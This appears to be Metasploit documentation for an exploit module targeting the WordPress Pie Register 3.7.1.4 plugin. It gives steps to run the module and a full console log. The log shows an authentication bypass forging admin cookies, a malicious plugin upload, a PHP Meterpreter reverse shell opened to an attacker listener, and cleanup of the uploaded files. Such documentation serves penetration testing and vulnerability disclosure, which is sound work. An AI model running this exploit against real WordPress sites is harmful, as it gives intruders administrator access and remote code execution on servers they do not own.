## Vulnerable Application

Download [pie-register.3.7.1.4.zip](https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip).
Install and activate it.  No additional configuration is required.

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploit/unix/webapp/wp_pie_register_bypass_rce`
1. Do: `set rhosts [IP]`
1. Do: `run`
1. You should get a shell.

## Options

### USERID

The `USERID` of a valid user to generate a cookie for.  Must be an admin user.  Defaults to `1`.

## Scenarios

### Wordpress 5.4.4 with Pie Register 3.7.1.4

```
resource (pie_register.rb)> use wp_pie_register_bypass_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/unix/webapp/wp_pie_register_bypass_rce  2021-10-08       excellent  Yes    WordPress Plugin Pie Register Auth Bypass to RCE


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_pie_register_bypass_rce

[*] Using exploit/unix/webapp/wp_pie_register_bypass_rce
resource (pie_register.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (pie_register.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (pie_register.rb)> set verbose true
verbose => true
resource (pie_register.rb)> run
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking /wp-content/plugins/pie-register/readme.txt
[*] Found version 3.7.1.4 in the plugin
[+] The target appears to be vulnerable.
[*] Bypassing Authentiation
[*] Found cookie: wordpress_d2959e58288b6133e71de74309fcabfb=admin%7C1634151373%7C5hPhXSogmfTkj7p0WsuFUNe8moVYT6z8ZTcFLffuCVE%7Cac034a6841edfa4d49e5ab75cb37b69f52a8a92bcf9ad335bd4ad77d287b5349
[*] Found cookie: wordpress_d2959e58288b6133e71de74309fcabfb=admin%7C1634151373%7C5hPhXSogmfTkj7p0WsuFUNe8moVYT6z8ZTcFLffuCVE%7Cac034a6841edfa4d49e5ab75cb37b69f52a8a92bcf9ad335bd4ad77d287b5349
[*] Found cookie: wordpress_logged_in_d2959e58288b6133e71de74309fcabfb=admin%7C1634151373%7C5hPhXSogmfTkj7p0WsuFUNe8moVYT6z8ZTcFLffuCVE%7C3f79f2326314d81da1e4fd4dd8b29a30a1666c8b6378ca719377cf0fd4e6dfff
[*] Preparing payload...
[*] Uploading payload...
[*] Acquired a plugin upload nonce: 04f6142d66
[*] Uploaded plugin iQujVpTJNo
[*] Executing the payload at /wp-content/plugins/iQujVpTJNo/pZtgbKCrHr.php...
[*] Sending stage (39282 bytes) to 1.1.1.1
[+] Deleted pZtgbKCrHr.php
[+] Deleted iQujVpTJNo.php
[+] Deleted ../iQujVpTJNo
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:51748 ) at 2021-10-11 15:16:27 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : wordpress2004
OS          : Linux wordpress2004 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64
Meterpreter : php/linux
```
